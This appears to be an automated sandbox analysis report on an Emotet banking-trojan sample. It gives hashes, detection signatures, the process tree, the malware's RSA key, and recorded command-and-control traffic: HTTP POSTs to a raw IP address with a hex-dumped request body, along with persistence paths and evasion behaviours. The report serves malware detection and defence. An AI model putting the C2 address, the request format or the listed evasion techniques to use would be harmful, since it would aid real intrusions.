Loading ...

Play interactive tourEdit tour

Analysis Report 2pf7VAYK.exe

Overview

General Information

Sample Name:2pf7VAYK.exe
Analysis ID:289509
MD5:cffef374aa5d46b7c2fc602dcecfda06
SHA1:8b70ce1afdfca311f23f7b3c0c604ab5fd1b13a2
SHA256:bd7b495b244b5fb2b38f11fb9699b6a993f06afeadfb24084fc889bde687fc43

Most interesting Screenshot:

Detection

Emotet
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • 2pf7VAYK.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\2pf7VAYK.exe' MD5: CFFEF374AA5D46B7C2FC602DCECFDA06)
    • EmailApis.exe (PID: 7008 cmdline: C:\Windows\SysWOW64\vcamp120\EmailApis.exe MD5: CFFEF374AA5D46B7C2FC602DCECFDA06)
  • svchost.exe (PID: 6412 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4772 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4048 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6356 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 7000 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 7132 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.441742476.0000000002181000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000002.178857289.0000000000701000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000000.00000002.178799595.00000000006B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.441723707.0000000002164000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000000.00000002.178837009.00000000006E4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.2pf7VAYK.exe.700000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              1.2.EmailApis.exe.2180000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for submitted fileShow sources
                Source: 2pf7VAYK.exeVirustotal: Detection: 9%Perma Link
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02182210 CryptExportKey,CryptEncrypt,CryptDestroyHash,GetProcessHeap,RtlAllocateHeap,CryptGetHashParam,memcpy,CryptDuplicateHash,1_2_02182210
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_021825C0 CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,1_2_021825C0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02181FA0 CryptDuplicateHash,memcpy,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,1_2_02181FA0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02183810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,1_2_02183810
                Source: Joe Sandbox ViewIP Address: 174.106.122.139 174.106.122.139
                Source: global trafficHTTP traffic detected: POST /e20DyMydyg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/e20DyMydyg/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------QlvyMyFgRxyLaTHost: 174.106.122.139Content-Length: 4596Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e20DyMydyg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/e20DyMydyg/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------QlvyMyFgRxyLaTHost: 174.106.122.139Content-Length: 4596Cache-Control: no-cacheData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 51 6c 76 79 4d 79 46 67 52 78 79 4c 61 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 6c 73 7a 75 72 68 70 77 6e 66 73 64 72 6f 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 64 6f 67 71 6e 71 63 73 69 6e 71 63 78 65 62 6e 6e 65 66 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 78 0a 66 6e e6 02 f4 3f 64 4e fb 1b 42 74 22 b9 01 8f 3a 4c ba b8 81 b8 50 99 4e c6 07 20 0f 42 f7 b3 ec e8 16 67 54 6a b9 9a 95 ea e7 26 f7 25 bf d0 9a 3d 9d 28 5e 0b 67 f9 32 1f d1 d5 32 dd 5c 73 d2 ad 08 7c 58 11 76 cc e5 3f 1e 56 b5 fc 5c 8b 36 48 ea 85 a8 be 5f ec 89 ef ea a2 8b 12 8c ec 8f 31 ff 43 e3 2d 9c 77 36 62 f7 87 b3 d4 92 b8 17 3f c8 56 99 bf 3f 46 3b 3e a6 c7 b3 00 3d d2 54 67 3b f1 a0 90 1d 4a 09 70 59 e5 72 db ca c0 e2 47 7b 4e 06 09 f1 d2 b9 52 19 68 67 68 5f eb d4 8f 42 9a b4 3a 9b bf 00 2f d0 eb ac d5 19 86 e9 bf bb 6a 4b 2f b8 3b ac bf 5a d3 bb 46 68 d2 8f 64 bc f4 ec c6 71 7c 4b 6e f3 c0 5b ac 8c c0 79 06 18 5c e3 60 42 9a 99 76 38 6e e5 ad cd ef e3 a1 3a 61 5b ef c9 42 d4 82 ae a0 20 4e 79 6e 77 bb c1 14 fd 6b b7 93 08 df 06 c1 c2 57 ac d6 e5 2d bb 2c ea e6 88 be 5e b3 d8 96 0d d5 f5 35 45 1c ed e4 01 f6 19 58 6a 74 9e 00 8c ed b5 35 a7 f1 9e 00 87 31 ae fc c7 8b cd b7 82 2b 42 7b c2 51 68 3d ea 54 4f f6 66 40 6b 65 67 c8 78 93 0e 89 40 48 00 ce 5e 5f d2 df 24 62 3d 2f 9d 8a 44 4b 1e b7 77 60 a6 d2 9e 50 ba 0e ac 47 31 13 9e 5e 1c 82 6f c7 5e 4e 0f e6 db 9d 24 a8 62 54 14 9d 95 97 9e 22 0b 55 7e 76 42 c2 63 c8 f7 ba eb 54 a8 3d d7 83 e7 b5 e4 12 5b f6 f6 19 77 28 8d 6d ff 8a 5c 8e ca 43 15 97 51 24 3d b2 5f 48 8c 70 67 a4 e9 07 d5 68 d5 3b 70 e8 2f b2 a0 be 79 9e 90 39 c6 22 12 ef 76 e0 1f 0d d4 4d 0b c9 3e e9 0f 52 c2 5a a6 00 5d b5 75 f1 75 06 ef 85 60 3f e3 6e 97 c5 a3 cf a8 39 53 e8 8f d0 f4 16 5c 56 10 7e 45 17 9f 91 c0 fe 0a 1b 1b bf e3 41 cb c6 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 51 6c 76 79 4d 79 46 67 52 78 79 4c 61 54 2d 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02182920 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,1_2_02182920
                Source: unknownHTTP traffic detected: POST /e20DyMydyg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/e20DyMydyg/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------QlvyMyFgRxyLaTHost: 174.106.122.139Content-Length: 4596Cache-Control: no-cache
                Source: EmailApis.exe, 00000001.00000002.442315916.000000000288E000.00000004.00000001.sdmpString found in binary or memory: http://174.106.122.139/e20DyMydyg/
                Source: EmailApis.exe, 00000001.00000002.442315916.000000000288E000.00000004.00000001.sdmpString found in binary or memory: http://174.106.122.139/e20DyMydyg/x
                Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000006.00000002.442381117.000001CF19370000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000006.00000002.441398124.000001CF13C99000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumera
                Source: svchost.exe, 00000006.00000002.441398124.000001CF13C99000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
                Source: svchost.exe, 0000000A.00000002.303911258.0000020407213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 0000000A.00000003.303081749.0000020407249000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000A.00000002.303990056.000002040724B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000A.00000002.304015877.000002040725C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 0000000A.00000003.303081749.0000020407249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000A.00000002.304015877.000002040725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000A.00000002.304015877.000002040725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000A.00000002.303990056.000002040724B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.303081749.0000020407249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000A.00000003.302979350.0000020407260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000A.00000003.281277897.0000020407231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000A.00000002.303967263.000002040723D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.303911258.0000020407213000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000A.00000003.303222664.0000020407240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000A.00000003.281277897.0000020407231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000A.00000003.281277897.0000020407231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000A.00000002.303990056.000002040724B000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: svchost.exe, 00000006.00000002.442499036.000001CF19413000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: 2pf7VAYK.exe, 00000000.00000002.178899656.000000000079A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000001.00000002.441742476.0000000002181000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.178857289.0000000000701000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.178799595.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.441723707.0000000002164000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.178837009.00000000006E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.441653243.0000000002050000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.2pf7VAYK.exe.700000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.EmailApis.exe.2180000.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_021825C0 CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,1_2_021825C0
                Source: C:\Users\user\Desktop\2pf7VAYK.exeFile created: C:\Windows\SysWOW64\vcamp120\Jump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exeFile deleted: C:\Windows\SysWOW64\vcamp120\EmailApis.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_004034C10_2_004034C1
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00403AE80_2_00403AE8
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_004034C11_2_004034C1
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_00403AE81_2_00403AE8
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_021882B01_2_021882B0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02181C601_2_02181C60
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02183CB01_2_02183CB0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02183EE01_2_02183EE0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_021877001_2_02187700
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02183F071_2_02183F07
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02187F301_2_02187F30
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02183B201_2_02183B20
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_021865B01_2_021865B0
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02059E4E1_2_02059E4E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205584E1_2_0205584E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205E64B1_2_0205E64B
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205E6621_2_0205E662
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02055A7E1_2_02055A7E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205929E1_2_0205929E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02055AA51_2_02055AA5
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_020556BE1_2_020556BE
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02059ACE1_2_02059ACE
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205814E1_2_0205814E
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205E15B1_2_0205E15B
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_0205E3BA1_2_0205E3BA
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_020537FE1_2_020537FE
                Source: 2pf7VAYK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2pf7VAYK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2pf7VAYK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2pf7VAYK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2pf7VAYK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2pf7VAYK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: 2pf7VAYK.exe, 00000000.00000002.180120246.00000000029F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 2pf7VAYK.exe
                Source: 2pf7VAYK.exe, 00000000.00000002.180120246.00000000029F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2pf7VAYK.exe
                Source: 2pf7VAYK.exe, 00000000.00000002.179904020.00000000028F0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 2pf7VAYK.exe
                Source: classification engineClassification label: mal68.troj.evad.winEXE@13/5@0/2
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02184CB0 Process32NextW,Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CloseHandle,FindCloseChangeNotification,1_2_02184CB0
                Source: C:\Users\user\Desktop\2pf7VAYK.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7140:120:WilError_01
                Source: 2pf7VAYK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\2pf7VAYK.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: 2pf7VAYK.exeVirustotal: Detection: 9%
                Source: unknownProcess created: C:\Users\user\Desktop\2pf7VAYK.exe 'C:\Users\user\Desktop\2pf7VAYK.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\vcamp120\EmailApis.exe C:\Windows\SysWOW64\vcamp120\EmailApis.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\2pf7VAYK.exeProcess created: C:\Windows\SysWOW64\vcamp120\EmailApis.exe C:\Windows\SysWOW64\vcamp120\EmailApis.exeJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                Source: C:\Users\user\Desktop\2pf7VAYK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: 2pf7VAYK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdbPA source: 2pf7VAYK.exe
                Source: Binary string: awWindow.pdb source: EmailApis.exe
                Source: Binary string: ctures\111\drawwindow_src\Release\DrawWindow.pdb source: EmailApis.exe
                Source: Binary string: c:\Users\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb source: 2pf7VAYK.exe
                Source: Binary string: sers\Dodo\Pictures\111\drawwindow_src\Release\DrawWindow.pdb source: EmailApis.exe
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_0040BD50 LoadLibraryW,GetProcAddress,0_2_0040BD50
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00403AD7 push ecx; ret 0_2_00403AE7
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00404CA0 push eax; ret 0_2_00404CB4
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00404CA0 push eax; ret 0_2_00404CDC
                Source: C:\Users\user\Desktop\2pf7VAYK.exeCode function: 0_2_00402BF8 push eax; ret 0_2_00402C16
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_00403AD7 push ecx; ret 1_2_00403AE7
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_00404CA0 push eax; ret 1_2_00404CB4
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_00404CA0 push eax; ret 1_2_00404CDC
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_00402BF8 push eax; ret 1_2_00402C16
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185E10 push ecx; mov dword ptr [esp], 00006163h1_2_02185E11
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02186030 push ecx; mov dword ptr [esp], 00002DB0h1_2_02186031
                Source: C:\Windows\SysWOW64\vcamp120\EmailApis.exeCode function: 1_2_02185E60 push ecx; mov dword ptr [esp], 0000FB39h1_2_02185E61
